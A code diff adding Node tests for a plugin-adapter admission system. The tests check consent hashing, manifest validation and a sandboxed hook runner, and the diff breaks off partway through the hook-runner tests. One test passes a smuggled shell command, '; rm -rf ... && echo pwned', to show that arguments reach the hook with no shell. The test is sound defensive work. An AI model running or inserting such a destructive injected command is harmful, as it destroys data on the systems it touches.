+  "driving": { "surfaces": ["cli-subprocess"] },
+  "lifecycle": {
+    "detect": {
+      "hook": { "command": ["node", "detect-hook.mjs"], "timeoutMs": 5000 }
+    }
+  },
+  "trust": {
+    "changes": [
+      {
+        "id": "acme-subprocess-hooks",
+        "kind": "third-party-adapter",
+        "scope": "project",
+        "owner": "acme",
+        "value": "subprocess hooks",
+        "effect": "run consented lifecycle hooks for acme"
+      }
+    ]
+  }
+}

--- a/tests/kit/about-directory.test.mjs
+++ b/tests/kit/about-directory.test.mjs
@@ -106,6 +106,14 @@ function shippedCommands() {
 
 // ---------------------------------------------------------------------------------------
 // The parity gate (ADR-0026 §3, component-directory invariant 4)
+//
+// Scope: every assertion below walks HOST_REGISTRY / managedTools(), i.e. the BUILT-IN
+// adapter set — there is no dynamic or third-party host concept yet (see
+// src/lib/adapters/lifecycle-registry.mjs), so "built-in" and "the registry" are the same
+// set today. That makes this gate built-in-scoped by construction: an externally-admitted
+// adapter (wave-4 adapter-extension contract) is exempt from directory-card parity until
+// that contract graduates it into a card-carrying citizen — it will not appear in
+// HOST_REGISTRY / managedTools() until it does, so it cannot trip these assertions.
 // ---------------------------------------------------------------------------------------
 
 test('every managed tool has exactly one directory entry (registry → directory)', () => {

--- a/tests/kit/adapter-admission.test.mjs
+++ b/tests/kit/adapter-admission.test.mjs
@@ -1,0 +1,334 @@
+// Adapter Contract Dossier — admission gate + overlay + derived lifecycle.
+// admitAdapters must fail closed (never prompt, never construction-throw for
+// a bad entry), isolate one bad entry from every other, and refuse a
+// built-in-shadowing id. bootstrapHostAdapters must be a true no-op with the
+// experimental flag unset. buildAdmittedLifecycleAdapter must route declared
+// verbs through an injected hook runner and never fabricate a result for an
+// undeclared one.
+import { test, beforeEach } from 'node:test';
+import assert from 'node:assert/strict';
+import {
+  admitAdapters, bootstrapHostAdapters, hashManifest, canonicalizeManifest, SUPPORTED_CONTRACT,
+} from '../../src/lib/adapters/admission.mjs';
+import {
+  applyAdmitted, resetAdmitted, admittedHostIds, effectiveHostRegistry,
+} from '../../src/lib/adapters/admitted.mjs';
+import { validateAdapterManifest } from '../../src/lib/adapters/manifest.mjs';
+import { validateLifecycleAdapter } from '../../src/lib/adapters/lifecycle.mjs';
+import {
+  buildAdmittedLifecycleAdapter, registerAdmittedLifecycle, lifecycleAdapterFor,
+} from '../../src/lib/adapters/lifecycle-registry.mjs';
+import { HOST_REGISTRY } from '../../src/lib/adapters/registries.mjs';
+
+beforeEach(() => resetAdmitted());
+
+function validHost(overrides = {}) {
+  return {
+    id: 'hermes',
+    label: 'Hermes',
+    install: { bin: 'hermes', externalInstallPolicy: 'detect-never-overwrite' },
+    capabilities: {
+      canDriveSession: true, canBePrimary: false, canRouteActivities: true,
+      commandStatusline: false, transcripts: true, usage: false,
+      nativeMcpConfig: false, nativeGuidance: false,
+    },
+    trust: { approvalPolicy: 'unchanged', changes: [] },
+    enabledByDefault: false,
+    configProjection: 'ruflo',
+    observability: [],
+    ...overrides,
+  };
+}
+
+function validManifest(overrides = {}) {
+  return {
+    name: 'hermes',
+    version: '1.0.0',
+    contract: 1,
+    host: validHost(),
+    detection: { bin: 'hermes' },
+    driving: { surfaces: ['acp'] },
+    trust: {
+      changes: [{
+        id: 'hermes-subprocess-hooks', kind: 'third-party-adapter', scope: 'project',
+        owner: 'hermes', value: 'subprocess hooks', effect: 'run consented lifecycle hooks for hermes',
+      }],
+    },
+    ...overrides,
+  };
+}
+
+/** Consent store that trusts exactly the {name: hash} pairs given. */
+function trustingConsent(trusted = {}) {
+  return {
+    recordedHashFor: (name) => trusted[name] ?? null,
+    isTrusted: (name, hash) => trusted[name] === hash,
+  };
+}
+
+const neverCalled = (label) => () => { throw new Error(`${label} must not be called`); };
+
+test('SUPPORTED_CONTRACT is 1', () => {
+  assert.equal(SUPPORTED_CONTRACT, 1);
+});
+
+test('hashManifest is deterministic and key-order independent', () => {
+  const a = hashManifest({ a: 1, b: { c: 2, d: 3 } });
+  const b = hashManifest({ b: { d: 3, c: 2 }, a: 1 });
+  assert.equal(a, b);
+  assert.notEqual(a, hashManifest({ a: 1, b: { c: 2, d: 4 } }));
+});
+
+// ── P0-B: locale-independent hash ───────────────────────────────────────────
+// canonicalizeManifest used to sort keys with String#localeCompare, whose
+// result depends on the current ICU collation (locale). A key set containing
+// a locale-sensitive character (e.g. 'ä') can sort differently under
+// different locales, so the SAME manifest could canonicalize — and hash —
+// differently on a CI runner or container whose locale differs from where
+// consent was originally recorded, producing a bogus consent-stale refusal
+// for a manifest that never actually changed.
+test('canonicalizeManifest sorts keys by code unit, not locale collation', () => {
+  // Sanity check pinning the very drift this fix closes: under this
+  // process's ICU/locale, localeCompare puts 'ä' BEFORE 'z' — the opposite
+  // of code-unit order (ä is U+00E4 = 228, z is U+007A = 122).
+  assert.ok('ä'.localeCompare('z') < 0, 'sanity: this run\'s locale sorts ä before z under localeCompare');
+  const canon = canonicalizeManifest({ z: 1, ä: 2, a: 3 });
+  assert.ok(
+    canon.indexOf('"z"') < canon.indexOf('"ä"'),
+    `expected code-unit order (z before ä — NOT locale-collated), got: ${canon}`,
+  );
+});
+
+test('hashManifest is stable across key permutations even with locale-sensitive characters', () => {
+  const a = hashManifest({ z: 1, ä: 2, a: 3 });
+  const b = hashManifest({ a: 3, z: 1, ä: 2 });
+  const c = hashManifest({ ä: 2, a: 3, z: 1 });
+  assert.equal(a, b);
+  assert.equal(b, c);
+});
+
+test('a trusted, well-formed entry is admitted', async () => {
+  const manifest = validateAdapterManifest(validManifest());
+  const hash = hashManifest(manifest);
+  const results = await admitAdapters({
+    cfg: { hostAdapters: [{ name: 'hermes', source: 'mem://hermes' }] },
+    readManifest: async () => validManifest(),
+    consent: trustingConsent({ hermes: hash }),
+  });
+  assert.equal(results.length, 1);
+  assert.equal(results[0].admitted, true);
+  assert.equal(results[0].entry.id, 'hermes');
+});
+
+test('missing consent is refused with reason consent-required', async () => {
+  const results = await admitAdapters({
+    cfg: { hostAdapters: [{ name: 'hermes', source: 'mem://hermes' }] },
+    readManifest: async () => validManifest(),
+    consent: trustingConsent({}),
+  });
+  assert.equal(results[0].admitted, false);
+  assert.equal(results[0].reason, 'consent-required');
+});
+
+test('a stale (mismatched) consent hash is refused with reason consent-stale', async () => {
+  const results = await admitAdapters({
+    cfg: { hostAdapters: [{ name: 'hermes', source: 'mem://hermes' }] },
+    readManifest: async () => validManifest(),
+    consent: trustingConsent({ hermes: 'not-the-real-hash' }),
+  });
+  assert.equal(results[0].admitted, false);
+  assert.equal(results[0].reason, 'consent-stale');
+});
+
+test('an unsupported contract version is refused before consent is even consulted', async () => {
+  const results = await admitAdapters({
+    cfg: { hostAdapters: [{ name: 'hermes', source: 'mem://hermes' }] },
+    readManifest: async () => validManifest({ contract: 2 }),
+    consent: { recordedHashFor: neverCalled('consent.recordedHashFor'), isTrusted: neverCalled('consent.isTrusted') },
+  });
+  assert.equal(results[0].admitted, false);
+  assert.equal(results[0].reason, 'contract-version');
+});
+
+test('an entry claiming a built-in host id is refused, shadowing a built-in', async () => {
+  const builtinId = HOST_REGISTRY[0].id;
+  const results = await admitAdapters({
+    cfg: { hostAdapters: [{ name: builtinId, source: 'mem://shadow' }] },
+    readManifest: async () => validManifest({ name: builtinId, host: validHost({ id: builtinId }) }),
+    consent: { recordedHashFor: neverCalled('consent.recordedHashFor'), isTrusted: neverCalled('consent.isTrusted') },
+  });
+  assert.equal(results[0].admitted, false);
+  assert.equal(results[0].reason, 'builtin-shadow');
+});
+
+test('a manifest cap violation (e.g. canBePrimary) is refused with the schema-layer reason', async () => {
+  const results = await admitAdapters({
+    cfg: { hostAdapters: [{ name: 'hermes', source: 'mem://hermes' }] },
+    readManifest: async () => validManifest({
+      host: validHost({ capabilities: { ...validHost().capabilities, canBePrimary: true } }),
+    }),
+    consent: trustingConsent({}),
+  });
+  assert.equal(results[0].admitted, false);
+  assert.equal(results[0].reason, 'cap-can-be-primary');
+});
+
+test('an unreadable manifest source is refused, isolated from a good sibling entry', async () => {
+  const goodManifest = validateAdapterManifest(validManifest());
+  const goodHash = hashManifest(goodManifest);
+  const results = await admitAdapters({
+    cfg: {
+      hostAdapters: [
+        { name: 'broken', source: 'mem://broken' },
+        { name: 'hermes', source: 'mem://hermes' },
+      ],
+    },
+    readManifest: async (source) => {
+      if (source === 'mem://broken') throw new Error('ENOENT: no such file');
+      return validManifest();
+    },
+    consent: trustingConsent({ hermes: goodHash }),
+  });
+  assert.equal(results.length, 2);
+  const broken = results.find((r) => r.name === 'broken');
+  const good = results.find((r) => r.name === 'hermes');
+  assert.equal(broken.admitted, false);
+  assert.equal(broken.reason, 'manifest-unreadable');
+  assert.equal(good.admitted, true);
+});
+
+test('flag-off bootstrapHostAdapters is a true no-op: no readManifest/consent call, no output, no overlay change', async () => {
+  const before = effectiveHostRegistry();
+  const result = await bootstrapHostAdapters({
+    cfg: { hostAdapters: [{ name: 'hermes', source: 'mem://hermes' }] },
+    env: {}, // AK_EXPERIMENTAL_HOST_ADAPTERS unset
+    readManifest: neverCalled('readManifest'),
+    consent: { recordedHashFor: neverCalled('consent.recordedHashFor'), isTrusted: neverCalled('consent.isTrusted') },
+  });
+  assert.deepEqual(result, { active: false, admitted: [], warnings: [] });
+  assert.equal(effectiveHostRegistry(), before, 'overlay must be untouched');
+  assert.equal(effectiveHostRegistry(), HOST_REGISTRY);
+});
+
+test('flag-on but no configured adapters is also a no-op', async () => {
+  const result = await bootstrapHostAdapters({
+    cfg: { hostAdapters: [] },
+    env: { AK_EXPERIMENTAL_HOST_ADAPTERS: '1' },
+    readManifest: neverCalled('readManifest'),
+    consent: { recordedHashFor: neverCalled('consent.recordedHashFor'), isTrusted: neverCalled('consent.isTrusted') },
+  });
+  assert.deepEqual(result, { active: false, admitted: [], warnings: [] });
+});
+
+test('flag-on with a trusted entry admits it and applies the overlay', async () => {
+  const manifest = validateAdapterManifest(validManifest());
+  const hash = hashManifest(manifest);
+  const result = await bootstrapHostAdapters({
+    cfg: { hostAdapters: [{ name: 'hermes', source: 'mem://hermes' }] },
+    env: { AK_EXPERIMENTAL_HOST_ADAPTERS: '1' },
+    readManifest: async () => validManifest(),
+    consent: trustingConsent({ hermes: hash }),
+  });
+  assert.equal(result.active, true);
+  assert.equal(result.admitted.length, 1);
+  assert.deepEqual(result.warnings, []);
+  assert.deepEqual(admittedHostIds(), ['hermes']);
+  assert.equal(effectiveHostRegistry().length, HOST_REGISTRY.length + 1);
+});
+
+// ── overlay ──────────────────────────────────────────────────────────────
+
+test('effectiveHostRegistry returns the built-in registry (same reference) when nothing is admitted', () => {
+  assert.equal(effectiveHostRegistry(), HOST_REGISTRY);
+});
+
+test('effectiveHostRegistry returns builtins + external once applyAdmitted runs', () => {
+  applyAdmitted([{ entry: validHost({ id: 'hermes' }) }]);
+  const combined = effectiveHostRegistry();
+  assert.equal(combined.length, HOST_REGISTRY.length + 1);
+  assert.deepEqual(admittedHostIds(), ['hermes']);
+  assert.ok(HOST_REGISTRY.every((host) => combined.includes(host)));
+});
+
+// ── P2 finding 4: applyAdmitted rejects non-conforming entries + deep-freezes ─
+// applyAdmitted must only ever accept genuine admission output — a raw,
+// hand-built object bypassing validateHostAdapter entirely (e.g. one that
+// claims canBePrimary:true) must be rejected, not silently join
+// effectiveHostRegistry(); and every entry it does accept must be deeply
+// frozen so a caller holding a reference can't mutate a "trusted" host's
+// capabilities after the fact.
+
+test('applyAdmitted rejects a raw entry that bypasses validateHostAdapter (incomplete shape)', () => {
+  assert.throws(
+    () => applyAdmitted([{ id: 'raw-evil', capabilities: { canBePrimary: true } }]),
+    /label/,
+  );
+  assert.deepEqual(admittedHostIds(), [], 'the overlay must not have been mutated by a rejected call');
+});
+
+test('applyAdmitted deep-freezes every stored entry (and its nested capabilities/install/trust)', () => {
+  applyAdmitted([{ entry: validHost({ id: 'hermes' }) }]);
+  const entry = effectiveHostRegistry().find((host) => host.id === 'hermes');
+  assert.ok(Object.isFrozen(entry), 'the entry itself must be frozen');
+  assert.ok(Object.isFrozen(entry.capabilities), 'nested capabilities must be frozen too');
+  assert.ok(Object.isFrozen(entry.install), 'nested install must be frozen too');
+  assert.throws(() => { 'use strict'; entry.capabilities.canBePrimary = true; }, TypeError);
+  assert.equal(entry.capabilities.canBePrimary, false, 'the mutation attempt must not have taken effect');
+});
+
+// ── derived lifecycle ────────────────────────────────────────────────────
+
+test('buildAdmittedLifecycleAdapter satisfies validateLifecycleAdapter and routes a declared verb through the injected hook', async () => {
+  const manifest = validateAdapterManifest(validManifest({
+    lifecycle: { detect: { hook: { command: ['hermes', 'detect'], timeoutMs: 5000 } } },
+  }));
+  const calls = [];
+  const runHook = async (args) => {
+    calls.push(args);
+    return { ok: true, stdout: JSON.stringify({ observed: { version: '1.0.0' } }), exitCode: 0 };
+  };
+  const adapter = buildAdmittedLifecycleAdapter(manifest, { runHook });
+  assert.doesNotThrow(() => validateLifecycleAdapter(adapter));
+
+  const detected = await adapter.detect({ env: { X: '1' } });
+  assert.deepEqual(detected, { observed: { version: '1.0.0' } });
+  assert.equal(calls.length, 1);
+  assert.equal(calls[0].hostId, 'hermes');
+  assert.equal(calls[0].verb, 'detect');
+  assert.equal(calls[0].timeoutMs, 5000);
+  assert.deepEqual(calls[0].hook.command, ['hermes', 'detect']);
+});
+
+test('buildAdmittedLifecycleAdapter gives an honest no-op for an undeclared verb (never calls the hook)', async () => {
+  const manifest = validateAdapterManifest(validManifest({
+    lifecycle: { detect: { hook: { command: ['hermes', 'detect'] } } },
+  }));
+  const adapter = buildAdmittedLifecycleAdapter(manifest, { runHook: neverCalled('runHook') });
+  const result = await adapter.apply({});
+  assert.equal(result.ok, true);
+  assert.equal(result.changed, false);
+});
+
+test('buildAdmittedLifecycleAdapter reports a hook failure honestly instead of fabricating success', async () => {
+  const manifest = validateAdapterManifest(validManifest({
+    lifecycle: { verify: { hook: { command: ['hermes', 'verify'] } } },
+  }));
+  const runHook = async () => ({ ok: false, stdout: 'boom', exitCode: 1 });
+  const adapter = buildAdmittedLifecycleAdapter(manifest, { runHook });
+  const result = await adapter.verify({});
+  assert.equal(result.observed, null);
+  assert.equal(result.error, 'boom');
+});
+
+test('registerAdmittedLifecycle checks effectiveHostRegistry, not HOST_REGISTRY, and is retrievable via lifecycleAdapterFor', () => {
+  applyAdmitted([{ entry: validHost({ id: 'hermes' }) }]);
+  const manifest = validateAdapterManifest(validManifest());
+  const runHook = async () => ({ ok: true, stdout: '{}', exitCode: 0 });
+  const registered = registerAdmittedLifecycle(manifest, { runHook });
+  assert.equal(lifecycleAdapterFor('hermes'), registered);
+});
+
+test('registerAdmittedLifecycle throws for a host id absent from effectiveHostRegistry', () => {
+  const manifest = validateAdapterManifest(validManifest({ name: 'ghost', host: validHost({ id: 'ghost' }) }));
+  assert.throws(() => registerAdmittedLifecycle(manifest), /ghost/);
+});

--- a/tests/kit/adapter-conformance.test.mjs
+++ b/tests/kit/adapter-conformance.test.mjs
@@ -1,0 +1,313 @@
+// Adapter Contract Dossier — BLACK-BOX conformance harness. Every other
+// adapter-*.test.mjs file exercises admission/manifest/hook-runner as UNIT
+// tests with in-memory manifests and injected readManifest/runHook stubs.
+// This file is the graduation artifact ADR-0029 names: a REAL fixture
+// adapter (tests/fixtures/adapters/acme/) admitted through the REAL
+// admitAdapters, with a REAL on-disk consent record, whose declared
+// lifecycle hook is a REAL subprocess actually spawned through the REAL
+// hook-runner — proving the contract end-to-end, not just at the unit
+// boundary (ruflo ADR-102: black-box subprocess tests against an installed
+// layout catch what unit tests miss).
+//
+// A future external adapter (Hermes, first) is expected to pass this same
+// shape of test against ITS OWN manifest — runConformanceReport() is
+// exported so a future `ak adapters conformance` command or CI step can
+// reuse this exact sequence instead of re-implementing it.
+import { test, before } from 'node:test';
+import assert from 'node:assert/strict';
+import fs from 'node:fs';
+import os from 'node:os';
+import path from 'node:path';
+import { fileURLToPath } from 'node:url';
+import { validateAdapterManifest } from '../../src/lib/adapters/manifest.mjs';
+import { admitAdapters, hashManifest } from '../../src/lib/adapters/admission.mjs';
+import {
+  applyAdmitted, resetAdmitted, effectiveHostRegistry, admittedHostIds,
+} from '../../src/lib/adapters/admitted.mjs';
+import {
+  recordConsent, recordedHashFor, isTrusted, revokeConsent,
+} from '../../src/lib/adapters/consent.mjs';
+import { registerAdmittedLifecycle } from '../../src/lib/adapters/lifecycle-registry.mjs';
+
+// Resolved relative to THIS file via fileURLToPath, never a hardcoded
+// repo-absolute or monorepo-sibling path (ruflo #2912 counter-example) — so
+// the harness works whether it runs from a checkout or an installed layout.
+const FIXTURE_ROOT = path.resolve(path.dirname(fileURLToPath(import.meta.url)), '../fixtures/adapters/acme');
+
+const NEGATIVE_CORPUS = [
+  ['a manifest claiming host.capabilities.canBePrimary', 'can-be-primary.json', 'acme-primary', 'cap-can-be-primary'],
+  ['a manifest with a path-traversal guidanceFile', 'guidance-traversal.json', 'acme-legacy', 'invalid-guidance-file'],
+  ['a manifest declaring an unsupported contract version', 'contract-two.json', 'acme-v2', 'contract-version'],
+  ["a manifest shadowing the built-in 'claude' host id", 'shadow-claude.json', 'claude', 'builtin-shadow'],
+];
+
+/**
+ * The manifest contract has no path-resolution policy of its own yet
+ * (hook.command is just "a non-empty array of non-empty strings" —
+ * manifest.mjs never inspects the values). A real installed adapter would
+ * need SOME resolution step to turn a portable manifest's declared command
+ * into a locally-runnable one; that step doesn't exist in src/ today, so
+ * this is a minimal, test-owned stand-in: the literal token 'node' becomes
+ * process.execPath (never a bare PATH-searched 'node' — the same portability
+ * concern the hook-runner tests already document), and a relative *.mjs
+ * argument is resolved against the fixture's own directory (where the
+ * committed hook script actually lives), not the CWD.
+ */
+function resolveManifestCommands(raw, hookDir) {
+  if (!raw || typeof raw !== 'object' || !raw.lifecycle || typeof raw.lifecycle !== 'object') return raw;
+  const lifecycle = {};
+  for (const [verb, entry] of Object.entries(raw.lifecycle)) {
+    if (!entry?.hook?.command) { lifecycle[verb] = entry; continue; }
+    const command = entry.hook.command.map((part) => {
+      if (part === 'node') return process.execPath;
+      if (part.endsWith('.mjs') && !path.isAbsolute(part)) return path.join(hookDir, part);
+      return part;
+    });
+    lifecycle[verb] = { ...entry, hook: { ...entry.hook, command } };
+  }
+  return { ...raw, lifecycle };
+}
+
+/** admitAdapters' readManifest contract: `(source) => Promise<any>`. A REAL
+ *  fs read of a REAL file — nothing about this fixture's admission path is
+ *  in-memory. */
+async function readManifestFromFile(source) {
+  const text = fs.readFileSync(source, 'utf8');
+  return resolveManifestCommands(JSON.parse(text), FIXTURE_ROOT);
+}
+
+function consentStoreFor(file) {
+  return {
+    recordedHashFor: (name) => recordedHashFor(name, { file }),
+    isTrusted: (name, hash) => isTrusted(name, hash, { file }),
+  };
+}
+
+const neverCalled = (label) => () => { throw new Error(`${label} must not be called`); };
+
+/**
+ * Run the full black-box conformance sequence against a fixture bundle and
+ * return a numeric pass/fail summary — the evidence shape a graduation gate
+ * (a future `ak` command or CI check) can consume directly. Self-contained:
+ * builds its own temp consent store, runs every check independently (one
+ * check's failure doesn't abort the rest — a downstream check that depends
+ * on an earlier one just fails honestly with its own detail), and cleans up
+ * after itself. Safe to call more than once in the same process.
+ * @param {{ fixtureRoot?: string }} [options]
+ * @returns {Promise<{ total: number, passed: number, failed: number,
+ *   checks: Array<{ name: string, ok: boolean, detail?: string }> }>}
+ */
+export async function runConformanceReport({ fixtureRoot = FIXTURE_ROOT } = {}) {
+  const checks = [];
+  const run = async (name, fn) => {
+    try {
+      await fn();
+      checks.push({ name, ok: true });
+    } catch (error) {
+      checks.push({ name, ok: false, detail: error?.message ?? String(error) });
+    }
+  };
+
+  const tempDir = fs.mkdtempSync(path.join(os.tmpdir(), 'ak-adapter-conformance-'));
+  const consentFile = path.join(tempDir, 'adapter-consent.json');
+  const consent = consentStoreFor(consentFile);
+  const validManifestPath = path.join(fixtureRoot, 'manifest.json');
+
+  let validated = null;
+  let admittedResult = null;
+
+  await run('valid manifest parses, validates, and is admitted through a real on-disk consent record', async () => {
+    const raw = await readManifestFromFile(validManifestPath);
+    validated = validateAdapterManifest(raw);
+    const validHash = hashManifest(validated);
+    recordConsent('acme', validHash, { file: consentFile });
+    const results = await admitAdapters({
+      cfg: { hostAdapters: [{ name: 'acme', source: validManifestPath }] },
+      readManifest: readManifestFromFile,
+      consent,
+    });
+    admittedResult = results[0];
+    assert.equal(admittedResult?.admitted, true, admittedResult?.detail ?? 'expected admission');
+    assert.equal(admittedResult.entry.id, 'acme');
+  });
+
+  await run("admitted 'acme' host joins effectiveHostRegistry()", async () => {
+    if (!admittedResult?.admitted) throw new Error('prerequisite: valid manifest was not admitted');
+    applyAdmitted([admittedResult]);
+    assert.ok(effectiveHostRegistry().some((host) => host.id === 'acme'));
+    assert.ok(admittedHostIds().includes('acme'));
+  });
+
+  await run("the fixture's declared detect hook runs as a real subprocess and its JSON payload flows back", async () => {
+    if (!validated) throw new Error('prerequisite: manifest was not validated');
+    // No runHook injection: this exercises buildAdmittedLifecycleAdapter's
+    // real default, a dynamic import of the real hook-runner.mjs — proof
+    // the whole chain (derived adapter -> hook runner -> spawned Node
+    // process -> stdout JSON) actually runs, not just that it's wired.
+    const adapter = registerAdmittedLifecycle(validated);
+    const detected = await adapter.detect({});
+    assert.equal(detected?.observed?.host, 'acme');
+    assert.equal(detected?.observed?.bin, 'acme');
+    assert.equal(typeof detected?.observed?.pid, 'number');
+  });
+
+  for (const [description, file, cfgName, reason] of NEGATIVE_CORPUS) {
+    await run(`negative corpus: ${description} is refused with reason '${reason}'`, async () => {
+      const results = await admitAdapters({
+        cfg: { hostAdapters: [{ name: cfgName, source: path.join(fixtureRoot, 'invalid', file) }] },
+        readManifest: readManifestFromFile,
+        // Every reason in the negative corpus fires before consent is even
+        // consulted (structural cap, contract-version, or builtin-shadow all
+        // return earlier in admitOne) — proven, not assumed, by making a
+        // consent lookup here a hard failure.
+        consent: { recordedHashFor: neverCalled('recordedHashFor'), isTrusted: neverCalled('isTrusted') },
+      });
+      assert.equal(results[0].admitted, false);
+      assert.equal(results[0].reason, reason, results[0].detail);
+    });
+  }
+
+  await run('edit-invalidation: mutating one byte of the manifest invalidates the prior consent (consent-stale)', async () => {
+    const rawText = fs.readFileSync(validManifestPath, 'utf8');
+    if (!rawText.includes('"1.0.0"')) throw new Error("fixture no longer declares version '1.0.0' — update this byte-mutation");
+    const mutatedText = rawText.replace('"1.0.0"', '"1.0.1"');
+    assert.notEqual(mutatedText, rawText);
+    const mutatedRaw = resolveManifestCommands(JSON.parse(mutatedText), fixtureRoot);
+    const results = await admitAdapters({
+      cfg: { hostAdapters: [{ name: 'acme', source: 'mem://acme-mutated-by-conformance-report' }] },
+      readManifest: async () => mutatedRaw,
+      consent, // same store — still holds the ORIGINAL (pre-mutation) hash
+    });
+    assert.equal(results[0].admitted, false);
+    assert.equal(results[0].reason, 'consent-stale');
+  });
+
+  resetAdmitted();
+  try { fs.rmSync(tempDir, { recursive: true, force: true }); } catch { /* best-effort cleanup */ }
+
+  const passed = checks.filter((c) => c.ok).length;
+  return { total: checks.length, passed, failed: checks.length - passed, checks };
+}
+
+// ── node:test wiring: run the report once, assert each check individually ──
+// so `node --test` reports itemized pass/fail, while runConformanceReport
+// itself stays a plain, framework-independent async function.
+
+let report;
+before(async () => {
+  report = await runConformanceReport();
+});
+
+function assertCheck(name) {
+  const found = report.checks.find((c) => c.name === name);
+  assert.ok(found, `no such check recorded: ${name}`);
+  assert.equal(found.ok, true, found.detail);
+}
+
+test('valid manifest parses, validates, and is admitted through a real on-disk consent record', () => {
+  assertCheck('valid manifest parses, validates, and is admitted through a real on-disk consent record');
+});
+
+test("admitted 'acme' host joins effectiveHostRegistry()", () => {
+  assertCheck("admitted 'acme' host joins effectiveHostRegistry()");
+});
+
+test("the fixture's declared detect hook runs as a real subprocess and its JSON payload flows back", () => {
+  assertCheck("the fixture's declared detect hook runs as a real subprocess and its JSON payload flows back");
+});
+
+for (const [description, , , reason] of NEGATIVE_CORPUS) {
+  const name = `negative corpus: ${description} is refused with reason '${reason}'`;
+  test(name, () => assertCheck(name));
+}
+
+test('edit-invalidation: mutating one byte of the manifest invalidates the prior consent (consent-stale)', () => {
+  assertCheck('edit-invalidation: mutating one byte of the manifest invalidates the prior consent (consent-stale)');
+});
+
+test('runConformanceReport reports a clean pass with no failures', () => {
+  assert.equal(report.failed, 0, JSON.stringify(report.checks.filter((c) => !c.ok), null, 2));
+  assert.equal(report.total, 8);
+  assert.equal(report.passed, 8);
+});
+
+// ── GAP CLOSED (Wave 4 security remediation, P0-A): consent hashing used to
+// be scoped to the validated schema, not the manifest's full content ───────
+//
+// ADR-0029 §6 states the design intent plainly: "computes a content hash
+// over the manifest... attached to a specific byte sequence, never to an
+// identity that content can silently drift underneath." validateAdapterManifest
+// used to reconstruct a literal object from exactly seven known keys (name,
+// version, contract, host, detection, driving, lifecycle?, trust) and
+// hashManifest hashed THAT — so any top-level key outside that set,
+// including one that reads as an executable-looking hook declaration like
+// "postInstall", was silently DROPPED before hashing rather than rejected.
+// A recorded consent could therefore cover content the operator never
+// reviewed.
+//
+// manifest.mjs now allowlists every top-level (and host/host.install/
+// host.legacy) key: an unrecognized field is refused outright — 'unknown-
+// field' — before validation even reaches the host/detection/driving
+// sub-validators, so it can never reach hashManifest at all.
+//
+// tests/fixtures/adapters/acme/manifest-with-extraneous-field.json is
+// manifest.json plus one added top-level "postInstall" key — kept as the
+// fixture proving this exact class of attack is now closed, not merely
+// documented.
+test('GAP CLOSED: an added top-level field outside the schema is refused, not silently dropped before hashing', async () => {
+  const validRaw = await readManifestFromFile(path.join(FIXTURE_ROOT, 'manifest.json'));
+  const extraRaw = await readManifestFromFile(path.join(FIXTURE_ROOT, 'manifest-with-extraneous-field.json'));
+  assert.ok('postInstall' in extraRaw, 'fixture sanity: the extra field must actually be present in the raw JSON');
+
+  const validated = validateAdapterManifest(validRaw);
+  assert.throws(() => validateAdapterManifest(extraRaw), (error) => {
+    assert.equal(error.reason, 'unknown-field');
+    assert.match(error.message, /postInstall/);
+    return true;
+  });
+
+  const hash = hashManifest(validated);
+
+  // Consequence, proven end-to-end: a manifest carrying the extraneous field
+  // is refused by the real admission gate itself — reason 'unknown-field',
+  // BEFORE consent is even consulted — never silently admitted under a
+  // consent recorded for the original (extra-field-free) manifest.
+  const tempDir = fs.mkdtempSync(path.join(os.tmpdir(), 'ak-adapter-conformance-gap-'));
+  const consentFile = path.join(tempDir, 'adapter-consent.json');
+  try {
+    recordConsent('acme', hash, { file: consentFile });
+    const results = await admitAdapters({
+      cfg: { hostAdapters: [{ name: 'acme', source: path.join(FIXTURE_ROOT, 'manifest-with-extraneous-field.json') }] },
+      readManifest: readManifestFromFile,
+      consent: { recordedHashFor: neverCalled('recordedHashFor'), isTrusted: neverCalled('isTrusted') },
+    });
+    assert.equal(results[0].admitted, false, 'the manifest with the added field must never be admitted');
+    assert.equal(results[0].reason, 'unknown-field');
+  } finally {
+    fs.rmSync(tempDir, { recursive: true, force: true });
+  }
+});
+
+// ── P2 finding 8: revokeConsent must not walk the prototype chain ──────────
+// `name in store` (the `in` operator) checks the prototype chain, not just
+// own properties. revokeConsent('constructor') — or 'toString',
+// 'hasOwnProperty', ... — used to read true off Object.prototype and report
+// having revoked consent for an adapter that was never actually consented
+// to, which is a lie a caller (a future `ak host adapters` CLI) could act on.
+test("revokeConsent('constructor') on a store that never consented to it returns false, not a prototype-chain lie", () => {
+  const tempDir = fs.mkdtempSync(path.join(os.tmpdir(), 'ak-adapter-conformance-consent-'));
+  const consentFile = path.join(tempDir, 'adapter-consent.json');
+  try {
+    for (const protoName of ['constructor', 'toString', 'hasOwnProperty', '__proto__']) {
+      assert.equal(revokeConsent(protoName, { file: consentFile }), false,
+        `revokeConsent('${protoName}') on a never-consented store must be false, not a prototype-chain hit`);
+    }
+    // A REAL consented adapter must still revoke correctly (own-property path
+    // still works; this isn't just "everything returns false now").
+    recordConsent('acme', 'deadbeef', { file: consentFile });
+    assert.equal(revokeConsent('acme', { file: consentFile }), true);
+    assert.equal(recordedHashFor('acme', { file: consentFile }), null);
+  } finally {
+    fs.rmSync(tempDir, { recursive: true, force: true });
+  }
+});

--- a/tests/kit/adapter-hook-runner.test.mjs
+++ b/tests/kit/adapter-hook-runner.test.mjs
@@ -1,0 +1,182 @@
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import fs from 'node:fs';
+import os from 'node:os';
+import path from 'node:path';
+import { runAdapterHook } from '../../src/lib/adapters/hook-runner.mjs';
+import {
+  recordedHashFor, isTrusted, recordConsent, revokeConsent, adapterConsentPath,
+} from '../../src/lib/adapters/consent.mjs';
+
+const NODE = process.execPath;
+
+test('happy path: an echo script runs and returns ok with captured stdout', async () => {
+  const result = await runAdapterHook({
+    hook: { command: [NODE, '-e', "console.log('hello-hook')"] },
+    hostId: 'claude', verb: 'discover',
+  });
+  assert.equal(result.ok, true);
+  assert.equal(result.exitCode, 0);
+  assert.equal(result.detail, null);
+  assert.ok(result.stdout.includes('hello-hook'), result.stdout);
+});
+
+test('argv arrives literally — no shell, so shell metacharacters never execute', async () => {
+  const literal = '; rm -rf /tmp/should-not-run && echo pwned';
+  const result = await runAdapterHook({
+    // `node -e` has no script-path slot, so the first extra argv entry lands
+    // at process.argv[1] (verified empirically, not assumed).
+    hook: { command: [NODE, '-e', 'console.log(process.argv[1])', literal] },
+    hostId: 'claude', verb: 'discover',
+  });
+  assert.equal(result.ok, true);
+  // Strongest proof of no shell interpretation: the single logged line is
+  // exactly the literal, unsplit and unexpanded. If a shell had interpreted
+  // it, stdout would instead show an `rm` failure followed by a bare
+  // "pwned" line from the injected `echo`.
